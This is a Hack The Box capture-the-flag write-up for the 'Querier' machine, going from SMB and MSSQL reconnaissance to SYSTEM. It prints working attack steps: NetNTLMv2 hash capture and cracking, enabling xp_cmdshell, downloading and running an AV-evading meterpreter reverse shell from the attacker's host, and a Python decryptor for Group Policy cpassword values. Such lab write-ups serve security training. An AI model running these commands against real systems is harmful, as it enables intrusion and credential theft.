HTB: Querier

Details

This machine is Querier from Hack The Box

Recon Phase

Start by doing some service discovery

root@kali:~# nmap -T4 -sV -p- 10.10.10.125
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 16:59 GMT
Nmap scan report for 10.10.10.125
Host is up (0.033s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server vNext tech preview 14.00.1000
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.60 seconds

Then run it again with the default NSE scripts enabled (-sC), which pulls the domain, hostname and OS build out of the MSSQL and SMB services

root@kali:~# nmap -T4 -sVC -p- 10.10.10.125
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 17:01 GMT
Nmap scan report for 10.10.10.125
Host is up (0.035s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server  14.00.1000.00
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-03-02T16:46:28
|_Not valid after:  2049-03-02T16:46:28
|_ssl-date: 2019-03-02T17:01:43+00:00; -1m02s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1m01s, deviation: 0s, median: -1m01s
| ms-sql-info:
|   10.10.10.125:1433:
|     Version:
|       name: Microsoft SQL Server
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server
|_    TCP port: 1433
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-03-02 17:01:48
|_  start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.24 seconds

Shell Hunting

So there are two HTTP listeners, port 5985 (the WinRM endpoint) and port 47001 (a second HTTP.sys/HTTPAPI 2.0 listener); neither serves content in a browser, but I checked them anyway, starting with http://10.10.10.125:5985/

Screenshot 1

Then onto port 47001

Screenshot 2

On to SMB on port 445

root@kali:~# smbmap -H 10.10.10.125
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.125...
[+] IP: 10.10.10.125:445    Name: 10.10.10.125
    Disk                                                    Permissions
    ----                                                    -----------
[!] Access Denied

smbmap with no credentials was denied, so I tried listing the shares with smbclient instead

root@kali:~# smbclient -L 10.10.10.125
Enter WORKGROUP\root's password:

I just hit enter at the password prompt (a null session), which was enough to list the shares

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    Reports         Disk
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

This revealed a non-default share called Reports, so I mounted it, again with an empty password

root@kali:~# mkdir /tmp/mounted
root@kali:~# mount -v //10.10.10.125/Reports /tmp/mounted
Password for root@//10.10.10.125/Reports:

Then just hit enter again

mount.cifs kernel mount options: ip=10.10.10.125,unc=\\10.10.10.125\Reports,user=root,pass=********

I can check that out now

root@kali:/tmp/mounted# ls -la
drwxr-xr-x  2 root root     0 Jan 28 23:23  .
drwxrwxrwt 18 root root  4096 Mar  2 18:19  ..
-rwxr-xr-x  1 root root 12229 Jan 27 22:21 'Currency Volume Report.xlsm'

I opened it in Office

Screenshot 3

Screenshot 4

The sheet itself was empty, so I inspected the macros (olevba from oletools will dump the VBA source without opening the file in Office, which is the safer way to do this with an untrusted document)

Screenshot 5

The macro contained hard-coded database credentials

reporting:PcwTWTHRwryjc$c6

I used impacket's mssqlclient.py https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/mssqlclient.py to try to log in with them

root@kali:~# python mssqlclient.py reporting:PcwTWTHRwryjc$c6@10.10.10.125
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[-] ERROR(QUERIER): Line 1: Login failed for user 'reporting'.

It didn't work, so I tried Windows (NTLM) authentication instead

root@kali:~# python mssqlclient.py reporting:PcwTWTHRwryjc$c6@10.10.10.125 -windows-auth
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[-] ERROR(QUERIER): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

This had me stumped for a bit, but then I realised that the password contained a $. In an unquoted or double-quoted bash argument, $c6 is expanded as a (non-existent) shell variable, so the password actually sent was PcwTWTHRwryjc and both logins failed for the same reason; the "untrusted domain" message is simply how SQL Server reports a failed NTLM login. Escaping the $ (or single-quoting the whole argument) fixes it

root@kali:~# python mssqlclient.py reporting:PcwTWTHRwryjc\$c6@10.10.10.125 -windows-auth
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>

I was now in the SQL server (note the default database for this login is 'volume'), so I checked the client's built-in commands

SQL> help
     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd

So I tried xp_cmdshell

SQL> xp_cmdshell whoami
[-] ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.

The login has no EXECUTE permission on it, so I tried enabling it anyway; the client's enable_xp_cmdshell runs sp_configure 'show advanced options' and 'xp_cmdshell' followed by RECONFIGURE, which is what the errors below refer to

SQL> enable_xp_cmdshell
[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(QUERIER): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.

I was missing the required privileges, so the next step was to go after a higher-privileged account by stealing a hash. xp_dirtree takes a UNC path, and when it is pointed at my host the SQL Server service account authenticates to my machine over SMB, handing over a NetNTLMv2 challenge/response. First I tested whether it would connect out at all, listening on port 445 since that is the port it will connect to

root@kali:~# nc -nlvp 445
SQL> exec XP_DIRTREE '\\10.10.14.24\test'

And in the listener

connect to [10.10.14.24] from (UNKNOWN) [10.10.10.125] 49684
E�SMBrS�����"NT LM 0.12SMB 2.002SMB 2

The server connected back, so I ran Responder to capture the NTLM authentication properly

root@kali:~# responder
SQL> exec XP_DIRTREE '\\10.10.14.24\test'

Back in responder

[SNIP]
[+] Listening for events...
[SMBv2] NTLMv2-SSP Client   : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMBv2] NTLMv2-SSP Hash     : mssql-svc::QUERIER:32eb8061c13a93bc
[SMBv2] NTLMv2-SSP Client   : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : \gX
[SMBv2] NTLMv2-SSP Hash     : gX:::c93ee8688cfd97b1::
[SNIP]

This gave me two hashes (truncated here)

mssql-svc::QUERIER:32eb8061c13a93bc
gX:::c93ee8688cfd97b1::

I put them into a file called crack.txt and set john on them with rockyou (john only loaded the first one, the mssql-svc NetNTLMv2 hash; the second line is not a valid hash)

root@kali:~# john ./crack.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
corporate568     (mssql-svc)
1g 0:00:00:02 DONE (2019-03-02 20:33) 0.3401g/s 3059Kp/s 3059Kc/s 3059KC/s correforenz..colty999
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

This gave me creds of

mssql-svc:corporate568

And connected again, this time as mssql-svc with Windows authentication

root@kali:~# python mssqlclient.py mssql-svc:corporate568@10.10.10.125 -windows-auth
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>

This login has the rights to run sp_configure, so enabling xp_cmdshell worked this time

SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

Nice, so I'll try to use it

SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
querier\mssql-svc
NULL

So I have command execution as the service account, but I want a proper shell. I used Phantom-Evasion https://github.com/oddcod3/Phantom-Evasion to generate a meterpreter payload, saved it as jack.exe and moved it to /var/www/html

root@kali:~# mv jack.exe /var/www/html

And started up the webserver

root@kali:~# apache2ctl start

Then, through xp_cmdshell, created a directory on the target and fetched the executable from my web server

SQL> xp_cmdshell powershell -Command "mkdir C:\tmp"
SQL> xp_cmdshell powershell -Command "Invoke-WebRequest -Uri "http://10.10.14.24/jack.exe" -OutFile C:\tmp\jack.exe"

Then double check it worked

SQL> xp_cmdshell powershell -Command "dir C:\tmp"
[SNIP]
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/2/2019  11:59 PM          21760 jack.exe
[SNIP]

And set up a meterpreter handler

root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 10.10.14.24
LHOST => 10.10.14.24
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.24:4444

And activated my payload

SQL> xp_cmdshell C:\tmp\jack.exe
[*] Sending stage (179779 bytes) to 10.10.10.125
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.125:49696) at 2019-03-03 00:25:22 +0000
meterpreter >
[*] 10.10.10.125 - Meterpreter session 1 closed.  Reason: Died

It popped but died instantly, so I tried running it again

SQL> xp_cmdshell C:\tmp\jack.exe
output
--------------------------------------------------------------------------------
Access is denied.
NULL

Access denied on a file that ran a moment ago is consistent with the binary having been quarantined by antivirus after it was flagged. I generated fresh payloads and repeated the same upload-and-run steps; the third attempt held

[*] Sending stage (179779 bytes) to 10.10.10.125
[*] Meterpreter session 3 opened (10.10.14.24:4444 -> 10.10.10.125:49700) at 2019-03-03 00:40:31 +0000
meterpreter >

So I wanted the user flag

meterpreter > pwd
C:\Windows\system32

Which was on the desktop of the mssql-svc user, so I changed into that directory

meterpreter > dir
Listing: C:\Users\mssql-svc\Desktop
===================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-01-28 23:42:03 +0000  desktop.ini
100666/rw-rw-rw-  33    fil   2019-01-28 00:08:41 +0000  user.txt
meterpreter > cat user.txt
[REDACTED]

Hunting For System

With user done I could start working towards SYSTEM, first dropping into a cmd

meterpreter > shell
Process 1584 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\mssql-svc\Desktop>

After a bit of manual digging that turned up nothing useful, I grabbed PowerSploit's Privesc module (PowerUp) from https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc and put it on the target in the user's module path so it can be imported by name

C:\Users\mssql-svc\Documents\WindowsPowerShell\Modules\Privesc

And dropped into PowerShell to use it

C:\Users\mssql-svc\Desktop> powershell
PS C:\Users\mssql-svc\Documents\WindowsPowerShell\Modules> Import-Module Privesc

With the module imported I ran all of its checks; the hit that mattered was a cached Group Policy Preferences file

PS C:\Users\mssql-svc\Documents\WindowsPowerShell\Modules> Invoke-AllChecks
[SNIP]
Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group
            Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml

Groups.xml is a Group Policy Preferences file that was used to set the local Administrator password; it stores the password in a cpassword attribute encrypted with AES-256 under a key Microsoft published in the protocol documentation, so anyone who can read the file (here it was left in the local GPO history under C:\ProgramData) can recover it. PowerUp decrypts it directly, giving

Administrator:MyUnclesAreMarioAndLuigi!!1!
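What PowerUp did under the hood is small enough to show. The following is an added example (not the page's or PowerSploit's code) that parses a Group Policy Preferences XML file for cpassword attributes and decrypts them the way MS-GPPREF specifies: base64 with the padding stripped, AES-256-CBC with the published key and an all-zero IV, PKCS#7 padding, UTF-16LE plaintext. A minimal AES-256-CBC decryptor is included so it runs offline with only the standard library. The Groups.xml below is constructed; its cpassword is the public example value from the gpp-decrypt usage text, not the value from this box.

```python
import base64
import xml.etree.ElementTree as ET

# AES-256 key published in MS-GPPREF for GPP cpassword values; the IV is all zeros.
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")


# --- minimal AES-256-CBC decryptor (stdlib only) ---
def _gf_tables():
    exp, log = [0] * 256, [0] * 256
    x = 1
    for i in range(255):
        exp[i], log[x] = x, i
        x ^= (x << 1) ^ (0x11B if x & 0x80 else 0)  # multiply by the generator 3 in GF(2^8)
    return exp, log


_EXP, _LOG = _gf_tables()


def _mul(a, b):
    return _EXP[(_LOG[a] + _LOG[b]) % 255] if a and b else 0


def _sbox():
    box = []
    for a in range(256):
        b = _EXP[(255 - _LOG[a]) % 255] if a else 0  # multiplicative inverse
        s = b
        for _ in range(4):  # affine transform: b ^ rotl1 ^ rotl2 ^ rotl3 ^ rotl4 ^ 0x63
            b = ((b << 1) | (b >> 7)) & 0xFF
            s ^= b
        box.append(s ^ 0x63)
    return box


_SBOX = _sbox()
_INV_SBOX = sorted(range(256), key=_SBOX.__getitem__)


def _expand_key(key):
    """AES-256 key schedule: 60 words, returned as 15 round keys of 16 bytes."""
    w = [list(key[i:i + 4]) for i in range(0, 32, 4)]
    rcon = 1
    for i in range(8, 60):
        t = list(w[i - 1])
        if i % 8 == 0:
            t = [_SBOX[t[1]] ^ rcon, _SBOX[t[2]], _SBOX[t[3]], _SBOX[t[0]]]
            rcon = _mul(rcon, 2)
        elif i % 8 == 4:
            t = [_SBOX[v] for v in t]
        w.append([w[i - 8][j] ^ t[j] for j in range(4)])
    return [bytes(sum(w[4 * r:4 * r + 4], [])) for r in range(15)]


def _decrypt_block(rk, block):
    """Inverse cipher; state is column-major, byte i is row i%4 of column i//4."""
    s = [b ^ k for b, k in zip(block, rk[14])]
    for rnd in range(13, -1, -1):
        s = [s[4 * ((i // 4 - i % 4) % 4) + i % 4] for i in range(16)]  # InvShiftRows
        s = [_INV_SBOX[v] for v in s]                                    # InvSubBytes
        s = [v ^ k for v, k in zip(s, rk[rnd])]                          # AddRoundKey
        if rnd:                                                          # InvMixColumns
            out = []
            for c in range(4):
                a0, a1, a2, a3 = s[4 * c:4 * c + 4]
                out += [_mul(a0, 14) ^ _mul(a1, 11) ^ _mul(a2, 13) ^ _mul(a3, 9),
                        _mul(a0, 9) ^ _mul(a1, 14) ^ _mul(a2, 11) ^ _mul(a3, 13),
                        _mul(a0, 13) ^ _mul(a1, 9) ^ _mul(a2, 14) ^ _mul(a3, 11),
                        _mul(a0, 11) ^ _mul(a1, 13) ^ _mul(a2, 9) ^ _mul(a3, 14)]
            s = out
    return bytes(s)


def aes256_cbc_decrypt(key, iv, data):
    rk = _expand_key(key)
    out, prev = b"", iv
    for i in range(0, len(data), 16):
        blk = data[i:i + 16]
        out += bytes(x ^ y for x, y in zip(_decrypt_block(rk, blk), prev))
        prev = blk
    return out


def decrypt_cpassword(cpassword: str) -> str:
    """GPP strips the base64 '=' padding; plaintext is UTF-16LE with PKCS#7 padding."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    pt = aes256_cbc_decrypt(GPP_KEY, b"\x00" * 16, raw)
    return pt[:-pt[-1]].decode("utf-16-le")


def find_gpp_credentials(xml_text: str):
    """Return (userName, newName, password) for every Properties element carrying a cpassword."""
    found = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        cp = props.get("cpassword")
        if cp:
            found.append((props.get("userName"), props.get("newName", ""), decrypt_cpassword(cp)))
    return found


# Constructed Groups.xml; the cpassword is the public gpp-decrypt example value, not this box's.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" userName="Administrator"/>
  </User>
</Groups>"""

if __name__ == "__main__":
    for user, new_name, password in find_gpp_credentials(SAMPLE_GROUPS_XML):
        print(f"{user}:{password}" + (f" (renamed to {new_name})" if new_name else ""))
```

The same cpassword attribute appears in other Preferences files (ScheduledTasks.xml, Services.xml, DataSources.xml, Drives.xml, Printers.xml), so in practice you walk the whole Preferences tree, in SYSVOL on a domain controller or, as here, in the local Group Policy history under C:\ProgramData, and run every file through find_gpp_credentials.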

To get a shell with these I again used impacket, this time psexec.py, which uploads a service binary over ADMIN$ and runs it as SYSTEM (the ! characters in the password are escaped so bash history expansion does not mangle them)

root@kali:~# python psexec.py Administrator:MyUnclesAreMarioAndLuigi\!\!1\!@10.10.10.125
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.125.....
[*] Found writable share ADMIN$
[*] Uploading file cMteuWAG.exe
[*] Opening SVCManager on 10.10.10.125.....
[*] Creating service sudA on 10.10.10.125.....
[*] Starting service sudA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

That gave me a SYSTEM shell

C:\Windows\system32>whoami
nt authority\system

Time for the system flag

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is FE98-F373
 Directory of C:\Users\Administrator\Desktop
01/29/2019  12:04 AM    <DIR>          .
01/29/2019  12:04 AM    <DIR>          ..
01/28/2019  12:08 AM                33 root.txt
               1 File(s)             33 bytes
               2 Dir(s)   6,443,544,576 bytes free
C:\Users\Administrator\Desktop>type root.txt
[REDACTED]

And with that it was done
